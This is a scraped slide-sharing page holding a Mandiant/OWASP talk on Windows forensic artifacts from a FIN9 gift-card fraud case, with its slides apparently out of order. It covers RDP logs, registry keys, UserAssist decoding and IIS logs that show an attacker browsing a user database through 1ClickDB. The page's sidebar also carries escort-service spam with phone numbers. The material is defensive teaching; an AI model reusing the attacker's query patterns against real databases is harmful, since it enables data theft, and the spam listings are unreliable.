(Diagram: Conference Room PC → SSH Tunnel → Remote Desktop → Jump Server → Web Access (1ClickDB) → Web Server → Direct DB Access → Database Server)
52
Time | Source | System | Details
2018-12-24 23:11:21 | EventLog | ConfPC | Remote Desktop Services: User authentication succeeded: User: ITAdmin Domain: rewards Source Network Address: 127.0.0.1
2018-12-25 00:00:23 | RDP:MRU | ConfPC | Hostname: 192.168.1.38 User: rewards\ITAdmin
2018-12-25 00:33:42 | RDP:MRU | ConfPC | Hostname: RewardsDB User: rewards\DBO
2018-12-25 02:40:59 | ShellBag:MRU | ConfPC | My Network Places\hqdc1.com\hqdc1.com\general\DC01 [Desktop2400]
2018-12-25 02:40:59 | ShellBag:MRU | ConfPC | My Network Places\hqdc1.com\hqdc1.com\general\DC01\ITIO Server Infrastructure [
2018-12-25 02:40:59 | ShellBag:MRU | ConfPC | My Network Places\192.168.1.54\192.168.1.54\c$\Users\frank\AppData [Desktop290001]
2019-01-01 02:53:11 | RDP:MRU | ConfPC | Hostname: Webserver2 User: rewards\frank
2019-01-11 03:46:21 | ShellBag:MRU | ConfPC | My Network Places\192.168.1.54\192.168.1.54\c$\Users\frank\AppData\Roaming [Desktop2900010]
2019-01-11 03:51:36 | ShellBag:MRU | ConfPC | My Computer\C:\Users\ITAdmin [Desktop0043]
2019-01-11 03:51:54 | ShellBag:MRU | ConfPC | My Computer\C:\Users\ITAdmin\AppData [Desktop00430]
2019-01-12 03:41:41 | ShellBag:MRU | ConfPC | My Network Places\192.168.1.54\192.168.1.54\c$\Users\frank\Desktop [Desktop290000]
2019-01-12 03:41:42 | ShellBag:MRU | ConfPC | My Network Places\192.168.1.54\192.168.1.54\c$\Users\frank\Desktop\My Impo'tant stuff [Desktop2900002]
2019-01-12 03:42:22 | ShellBag:MRU | ConfPC | My Network Places\192.168.1.54\192.168.1.54\c$\Users\frank\Desktop\VDI [Desktop2900000]
2019-01-12 03:47:49 | ShellBag:MRU | ConfPC | My Network Places\192.168.1.54\192.168.1.54\c$\Users\frank\Desktop\AD Resumes [Desktop2900001]
2019-01-12 03:53:14 | ShellBag:MRU | ConfPC | My Network Places\192.168.1.54\192.168.1.54\c$\Users\frank\Desktop\O365 [Desktop2900003]
2019-01-12 03:53:47 | ShellBag:MRU | ConfPC | My Network Places\hqdc1.com\hqdc1.com\general [Desktop240]
2019-01-15 00:15:01 | RDP:MRU | ConfPC | Hostname: ITJumpserver User: rewards\dave
2019-01-22 00:23:33 | EventLog | ConfPC | Remote Desktop Services: User authentication succeeded: User: ITAdmin Domain: rewards Source Network Address: 127.0.0.1
2019-01-22 01:33:23 | EventLog | Jump | Remote Desktop Services: User authentication succeeded: User: dave Domain: rewards Source Network Address: 192.168.1.101
2019-01-22 01:33:23 | EventLog | Jump | Remote Desktop Services: Session logon succeeded User: rewards\dave Session ID: 2 Source Network Address: 192.168.1.101
2019-01-22 01:35:34 | Registry:LastWrite | Jump | Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.zip -> omg.zip
2019-01-22 01:39:03 | LNK:Create Time | Jump | C:\Users\dave\Desktop\results.txt (C:\Users\dave\AppData\Roaming\Microsoft\Windows\Recent\result.txt.lnk)
2019-01-22 01:39:23 | FN:Create Time | Jump | C:\Users\dave\AppData\Roaming\Microsoft\Windows\Recent\result.txt.lnk
2019-01-22 01:39:23 | Registry:LastWrite | Jump | Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.txt -> result.txt
2019-01-22 01:39:23 | UserAssist:Dave | Jump | C:\Users\dave\Desktop\omg.exe
2019-01-22 01:43:23 | UserAssist:Dave | Jump | {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\dssite.msc
2019-01-22 01:44:56 | UserAssist:Dave | Jump | {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\dsac.exe
2019-01-22 01:45:33 | IE:BrowserCache | Jump | Earliest Browser Cache Artifact Created
2019-01-22 02:28:01 | UserAssist:Dave | Jump | {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\mstsc.exe
2019-01-22 02:30:12 | IE:BrowserCache | Jump | Most Recent Browser Artifact Modified
2019-01-22 02:39:45 | EventLog | Jump | Remote Desktop Services: Session logoff succeeded: User: rewards\dave Session ID: 2
2019-01-22 02:39:45 | EventLog | Jump | Remote Desktop Services: Session has been disconnected: User: rewards\dave Session ID: 2 Source Network Address: 192.168.1.101
2019-01-22 02:55:45 | EventLog | ConfPC | Remote Desktop Services: Session has been disconnected: User: rewards\ITAdmin Session ID: 2 Source Network Address: 127.0.0.1
53
Case Study – Expanding View
§ Shellbags
§ RDP Logs
§ RDP Connections
§ LNK Files
§ MRU Keys
§ MuiCache
§ Jump Lists
§ RDP Bitmap Cache
§ SimonTatham Registry Values
§ Windows 10 Timeline
54
Other fun
Artifacts | Details
Windows Recycler | C:\$Recycle.Bin\<SID>\$R<RAND>.<EXT>
Windows Recycler | C:\$Recycle.Bin\<SID>\$I<RAND>.<EXT>
Browser History | ftp://<AttackerWebsite>
Browser History | file:///C:/Windows/127.0.0.1.pwdump
OpenWith Registry Keys | Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.cachedump\OpenWithList
OpenWith Registry Keys | Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.fgdump-log\OpenWithList
ViClient Logs | C:\Users\admin\AppData\Local\VMware\vpx\viclient-#-0000.log
55
Questions
Phillip.Kealy@Mandiant.com

CNG 256 wireless wi-fi and bluetooth
 
Differential learning SnowFROC 2017
Differential learning SnowFROC 2017Differential learning SnowFROC 2017
Differential learning SnowFROC 2017
 
Phishing Forensics - SnowFROC - Denver Chapter of OWASP
Phishing Forensics - SnowFROC - Denver Chapter of OWASP Phishing Forensics - SnowFROC - Denver Chapter of OWASP
Phishing Forensics - SnowFROC - Denver Chapter of OWASP
 
Active defensecombo clean
Active defensecombo cleanActive defensecombo clean
Active defensecombo clean
 
Dns security threats and solutions
Dns security   threats and solutionsDns security   threats and solutions
Dns security threats and solutions
 
Cng 125 – chapter 12 network policies
Cng 125 – chapter 12   network policiesCng 125 – chapter 12   network policies
Cng 125 – chapter 12 network policies
 
Authentication vs authorization
Authentication vs authorizationAuthentication vs authorization
Authentication vs authorization
 
9.0 security (2)
9.0 security (2)9.0 security (2)
9.0 security (2)
 
Lesson 6 web based attacks
Lesson 6 web based attacksLesson 6 web based attacks
Lesson 6 web based attacks
 

Recently uploaded

Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure servicePooja Nehwal
 
Key Features Of Token Development (1).pptx
Key  Features Of Token  Development (1).pptxKey  Features Of Token  Development (1).pptx
Key Features Of Token Development (1).pptxLBM Solutions
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphNeo4j
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j
 
Azure Monitor & Application Insight to monitor Infrastructure & Application
Azure Monitor & Application Insight to monitor Infrastructure & ApplicationAzure Monitor & Application Insight to monitor Infrastructure & Application
Azure Monitor & Application Insight to monitor Infrastructure & ApplicationAndikSusilo4
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...shyamraj55
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...HostedbyConfluent
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Paola De la Torre
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Allon Mureinik
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsMemoori
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticscarlostorres15106
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Alan Dix
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhisoniya singh
 

Recently uploaded (20)

Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
 
Key Features Of Token Development (1).pptx
Key  Features Of Token  Development (1).pptxKey  Features Of Token  Development (1).pptx
Key Features Of Token Development (1).pptx
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
 
Azure Monitor & Application Insight to monitor Infrastructure & Application
Azure Monitor & Application Insight to monitor Infrastructure & ApplicationAzure Monitor & Application Insight to monitor Infrastructure & Application
Azure Monitor & Application Insight to monitor Infrastructure & Application
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
 

Kealy OWASP interactive_artifacts

9
Targeted Attack Lifecycle – FIN9
• Phishing Email
• Word document with macros
• Netwire
• TeamViewer
• ScreenConnect
• EMCO
• Dameware
• NanoCore
• MimiKatz
• Keystroke logging
• Fake Logon Screen
• Sticky Keys
• Built-in Windows Utilities
• Net commands
• File shares
• Search for systems of interest
• Legitimate Access to apps
• Direct DB access using 1ClickDB
• Remote Desktop
• File Shares
• Netwire
• TeamViewer
• ScreenConnect
• EMCO
• SoftToken Certificate theft
11
Initial Lead
§ Fraud Department located Unauthorized Gift Cards issued on January 22, 2019
§ Suspicious rewards Database interaction on January 22, 2019 traced back to WebServerA
§ Live response analysis indicated attacker installed 1ClickDB via a remote desktop logon session on WebServerA using Domain Admin account Frank
- RDP session to install 1ClickDB occurred on January 19, 2019 between 03:44:56 UTC and 04:55:56 UTC from a system at an unknown IP address
§ IIS web server logs on WebServerA recorded access to 1ClickDB from the IP address of ITJumpServer
- Connections to 1ClickDB webpage occurred on January 22, 2019 between 01:45:33 UTC and 02:30:12 UTC
§ Now what?
- Live response analysis of WebServerA
12
Windows Logon Events
Type 2 – Interactive
- Physical console
- Screen sharing
- “RunAs”
- PsExec
Type 10 – Remote Interactive
- Remote Desktop / Terminal Services
Type 7 – Credentials used to unlock screen
Type 12 – Cached remote interactive
Type 13 – Cached unlock
13
Type 10 Logon – RDP
Diagram: Unknown System → RDP → ITJumpServer; logon recorded in the “Rewards” Domain Controller Security Event Log, EID 4624:
An account was successfully logged on.
User Name: franktheadmin
Domain: Rewards
Logon ID: (0x0,0x151F248)
Logon Type: 10
Logon Process: User32
Authentication Package: Negotiate
Workstation Name: ITJumpServer
Source Network Address: 192.168.1.101
14
RDP Event Logs
Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational
Date & Time | EID | Message
2019-01-22 01:33:23 | 1149 | Remote Desktop Services: User authentication succeeded: User: dave Domain: rewards Source Network Address: 192.168.1.101
2019-01-22 01:33:23 | 21 | Remote Desktop Services: Session logon succeeded User: rewards\dave Session ID: 2 Source Network Address: 192.168.1.101
2019-01-22 02:39:45 | 23 | Remote Desktop Services: Session logoff succeeded: User: rewards\dave Session ID: 2
2019-01-22 02:39:45 | 24 | Remote Desktop Services: Session has been disconnected: User: rewards\dave Session ID: 2 Source Network Address: 192.168.1.101
15
User Registry Hives
Registry Hive Path | Registry File on Disk | Windows Version
HKEY_USERS\<User SID> | \Users\<username>\NTUSER.DAT | Windows Vista/2008+
HKEY_USERS\<User SID>_Classes | \Users\<username>\AppData\Local\Microsoft\Windows\USRCLASS.DAT | Windows Vista/2008+
16
LNK Files
§ Windows shortcut files
§ Auto-generated when file opened in Explorer
§ Supports “Recent Files” / “Recent Docs” functionality
Windows Vista, 7, Server 2008 – LNK File Paths
- C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Recent
- C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Office\Recent
17
Data within LNK Files
§ Full file path (local or network)
§ Attributes and logical size
§ MAC timestamps for the referenced file at the time it was last opened
§ Output from “lnkparse.py”
- lnkparse.py - sourceforge.net/projects/jafat/files/lnk-parse/
18
LNK File of interest
Date & Time | Timestamp | File Name
2019-01-22 01:39:23 | Created | C:\Users\dave\AppData\Roaming\Microsoft\Windows\Recent\result.txt.lnk
Date & Time | Timestamp | Referenced File
2019-01-22 01:36:23 | Created, Modified, Accessed | C:\Users\dave\Desktop\result.txt
19
Most Recently Used (MRU) Keys
“RecentDocs”
§ Recently opened files
§ Multiple Subkeys for file types: .ini, .pem, .txt, .doc, .rdg, .zip, Folder, etc.
- HKEY_USERS\{SID}\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs
§ Binary Format
§ Stores most recent 10 opened files
Key Last Write | Registry Key | Parsed MRU Value
2019-01-22 01:36:23 | Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.txt | 0 = result.txt
2019-01-22 01:35:34 | Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.zip | 0 = omg.zip
20
Anatomy of a Registry Key
Example: Run key
Key: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Value Name: NotMalware
Value Data: C:\ProgramData\TotallyMalware\Evil.exe
21
Anatomy of a Registry Key
Example: Run key
Key Last Modified: 2017-06-05 19:33:51
§ Values inherit Last Modified time from their parent key
22
Registry Timestamps
A timestamp is applied to the ‘Key’, and is updated when…
1) Key created
2) Value created/deleted
3) Data of any Value is modified
Note: Registry timestamps can be modified, although this is not very common
23
Evidence of Execution
Artifact | Default Enabled | User Agnostic | All Windows Versions | Execution Visibility
ShimCache | Yes | Yes | Yes | Yes
AmCache | Yes | Yes | No | Yes
UserAssist | Yes | No | Yes | GUI only
MUICache | Yes | No | Yes | GUI only
Prefetch | Workstations only | Yes | Yes | Yes
Windows Events | No | Yes | Yes | Yes
WMI RUA | No | Yes | Yes | Yes
24
UserAssist and MUICache
Tracks files opened in Windows Explorer
- HKCU\{SID}\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist
- HKCU\{SID}\Software\Microsoft\Windows\ShellNoRoam\MUICache
UserAssist
- One value per executable file
• ROT13 encoded
- Number of times each program ran
- Last execution time
MUICache
- One value per executable file
• Clear-text
- Records “FileDescription” for PE files
25
UserAssist Evidence
Figure: raw contents of the UserAssist key beside the decoded UserAssist data; decoded output shown below.
userassist v.20080726
(NTUSER.DAT) Displays contents of UserAssist Active Desktop key
UserAssist (Active Desktop)
Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count
LastWrite Time Fri Jul 29 21:46:41 2011 (UTC)
Fri Jul 29 21:46:41 2017 (UTC)
  UEME_RUNPATH (3)
  UEME_RUNPATH:C:\Program Files\7-Zip\7zFM.exe (1)
Fri Jul 29 21:46:17 2017 (UTC)
  UEME_RUNPATH:C:\Program Files\Windows NT\Accessories\WORDPAD.EXE (1)
Fri Jul 29 21:44:45 2017 (UTC)
  UEME_RUNPIDL:%csidl2%\Internet Explorer.lnk (15)
  UEME_RUNPATH:C:\Program Files\Internet Explorer\IEXPLORE.EXE (1)
27
Decoded User Assist Data
Key Last Write | Registry Key | Times Executed
2019-01-22 01:36:23 | {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\msiexec.exe | 1
2019-01-22 01:33:48 | {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\ServerManager.exe | 1
2019-01-22 01:39:23 | C:\Users\dave\Desktop\omg.exe | 1
2019-01-22 01:43:23 | {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\dssite.msc | 1
2019-01-22 01:44:56 | {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\dsac.exe | 1
2019-01-22 02:28:01 | {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\mstsc.exe | 3
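Slides 24, 25 and 27 describe what a UserAssist value holds (ROT13 name, run count, last execution time). The decoder below is an added example, not code from the deck: it implements the documented 16-byte Windows XP and 72-byte Windows 7+ value layouts, expands the {1AC14E77-...} known-folder GUID seen on slide 27, and runs over sample values that are constructed inline (the registry entries are not real hive data).

```python
"""Decode UserAssist values: ROT13 value names plus binary run-count/last-run data.

Added example, not from the deck. Value layouts follow the documented Windows XP
(16-byte) and Windows 7+ (72-byte) UserAssist formats; SAMPLE_ENTRIES is constructed.
"""
import codecs
import struct
from datetime import datetime, timedelta, timezone

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)

# KNOWNFOLDERID GUIDs that prefix UserAssist paths on Windows 7+
KNOWN_FOLDERS = {
    "{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}": r"C:\Windows\System32",
    "{6D809377-6AF0-444B-8957-A3773F02200E}": r"C:\Program Files",
    "{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}": r"C:\Program Files (x86)",
}


def filetime_to_datetime(ft):
    """Windows FILETIME (100 ns ticks since 1601-01-01) -> aware UTC datetime."""
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def datetime_to_filetime(dt):
    return ((dt - FILETIME_EPOCH) // timedelta(microseconds=1)) * 10


def decode_name(value_name):
    """Value names are ROT13 encoded; known-folder GUIDs are expanded as well."""
    path = codecs.decode(value_name, "rot_13")
    resolved = path
    for guid, folder in KNOWN_FOLDERS.items():
        if path.upper().startswith(guid):
            resolved = folder + path[len(guid):]
            break
    return path, resolved


def parse_userassist_value(value_name, data):
    """Parse one UserAssist\\{GUID}\\Count value into a timeline-ready record."""
    path, resolved = decode_name(value_name)
    if len(data) >= 68:
        # Windows 7+: run count at offset 4, focus count at 8, focus time (ms)
        # at 12, last-execution FILETIME at offset 60
        run_count, focus_count, focus_ms = struct.unpack_from("<III", data, 4)
        last_ft = struct.unpack_from("<Q", data, 60)[0]
    elif len(data) == 16:
        # Windows XP: session id, run count (stored as count + 5), FILETIME
        _session, raw_count, last_ft = struct.unpack_from("<IIQ", data, 0)
        run_count, focus_count, focus_ms = max(raw_count - 5, 0), None, None
    else:
        raise ValueError("unrecognised UserAssist value length %d" % len(data))
    return {"path": path, "resolved_path": resolved, "run_count": run_count,
            "focus_count": focus_count, "focus_ms": focus_ms,
            "last_executed": filetime_to_datetime(last_ft) if last_ft else None}


def build_win7_value(run_count, last_executed, focus_count=0, focus_ms=0):
    """Construct a 72-byte Windows 7+ value (sample data only)."""
    return (struct.pack("<IIII", 0, run_count, focus_count, focus_ms)
            + b"\x00" * 44
            + struct.pack("<QI", datetime_to_filetime(last_executed), 0))


def build_xp_value(run_count, last_executed):
    """Construct a 16-byte Windows XP value (sample data only)."""
    return struct.pack("<IIQ", 0, run_count + 5, datetime_to_filetime(last_executed))


def decode_userassist(entries):
    """Decode (value_name, data) pairs and order them by last execution time."""
    rows = [parse_userassist_value(name, data) for name, data in entries]
    rows.sort(key=lambda r: (r["last_executed"] is None,
                             r["last_executed"] or FILETIME_EPOCH))
    return rows


def _utc(*parts):
    return datetime(*parts, tzinfo=timezone.utc)


# Constructed sample entries, ROT13-encoded the way the hive stores them
SAMPLE_ENTRIES = [
    (codecs.encode(r"{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\mstsc.exe", "rot_13"),
     build_win7_value(3, _utc(2019, 1, 22, 2, 28, 1))),
    (codecs.encode(r"C:\Users\dave\Desktop\omg.exe", "rot_13"),
     build_win7_value(1, _utc(2019, 1, 22, 1, 39, 23))),
    (codecs.encode(r"UEME_RUNPATH:C:\Program Files\7-Zip\7zFM.exe", "rot_13"),
     build_xp_value(1, _utc(2017, 7, 29, 21, 46, 41))),
]

if __name__ == "__main__":
    for row in decode_userassist(SAMPLE_ENTRIES):
        print(row["last_executed"], row["resolved_path"], row["run_count"])
```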
28
Jump Lists
§ Provides user quick access to recently used apps
§ Each user has their own jump lists
§ Shows evidence of accessed resources
§ Two types of jump lists
- Automatic: %APPDATA%\Microsoft\Windows\Recent\AutomaticDestinations
- Custom: %APPDATA%\Microsoft\Windows\Recent\CustomDestinations
§ Requires parsing to be human readable
- JumpListParser, JLECmd, jmp
29
Jump Lists
§ Automatic – created automatically when a user interacts with a resource
§ Custom – created when a user “pins” an item
30
Browser History, Cache, and Downloads
§ User Specific Artifact
§ Enumerate Browsers
§ Extract Browsing History
§ Collect Browser Cache
§ Collect Downloaded Files
31
Web Server Side Data - Logging
GET vs. POST
GET Requests
- “Retrieve” content specified in the request address
- Key-value pairs passed as part of URI
- Fully captured in logs (cs-uri-query)
POST Requests
- Tell the server to accept the data enclosed in the packet contents
- Key-value pairs passed in the message body
- Request parameters not logged
Impact: Malicious activity in POST requests can be hard to detect!
32
Web Server Side Data - Content Encoding
§ Special characters in HTTP requests are URL Encoded by the web browser
- % followed by the character’s two-digit hexadecimal ASCII code
- Spaces can be represented by %20 or +
http://www.foo.com/search.aspx?name=John & Mark Co.&op=1
…is converted to (and will be logged as)…
http://www.foo.com/search.aspx?name=John%20%26%20Mark%20Co.&op=1
33
GET /images/Browse.asp?sqlorderby_A="log_id"+DESC&sqlfrom_A="dbo"."<SYSTEM>_LOG"
GET /images/Schema.asp
GET /images/Browse.asp?sqlfrom_A="dbo"."<SYSTEM>_USERS"
GET /images/Browse.asp?ocdGridMode_A=Se<SYSTEM>h&sqlfrom_A="dbo"."<SYSTEM>_USERS"
GET /images/Browse.asp?sqlorderby_A=&sqlwhere_A=("email"+Like+'NAME2@EMAIL.com%')&sqlselecthide_A=&sqlpagesize_A=10&sqlfrom_A="dbo"."<SYSTEM>_USERS"
GET /images/Browse.asp?sqlorderby_A=&sqlwhere_A=("last_name"+Like+'NAME%')&sqlselecthide_A=&sqlpagesize_A=10&sqlfrom_A="dbo"."<SYSTEM>_USERS"
GET /images/Edit.asp?sqlid=1989&sqlfrom="dbo"."<SYSTEM>_USERS"&sqlorderby_A=&sqlwhere_A=("last_name"+Like+'NAME%')&sqlpagesize_A=10&sqlselecthide_A=&sqlfrom_A="dbo"."<SYSTEM>_USERS"&
GET /images/Connect.asp
GET /images/Schema.asp
GET /images/Edit.asp?sqlwhere=&sqlid=1989&sqlfrom="dbo"."<SYSTEM>_USERS"&sqlfrom_A="dbo"."<SYSTEM>_USERS"&sqlwhere_A=("email"+Like+'NAME@EMAIL.com%')&sqlpagesize_A=10&sqlorderby_A=&sqlselecthide_A=
GET /images/Browse.asp?sqlfrom_A="dbo"."<SYSTEM>_USERS"
POST /images/Command.asp?nocache=1/8/2017+12:34:10+PM
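Slides 31 to 33 make two points about IIS logs: GET parameters survive in cs-uri-query (URL-encoded), while POST bodies never reach the log. The parser below is an added example, not code from the deck; its two-line log excerpt is constructed (the field layout, the client address 192.168.1.101 and the "<SYSTEM>" redaction follow the slides, the server address and status codes are made up).

```python
"""Parse IIS W3C log lines and recover the request parameters they preserve.

Added example, not from the deck. SAMPLE_LOG is a constructed excerpt shaped
like the 1ClickDB requests on slide 33; IIS writes '-' for an empty field.
"""
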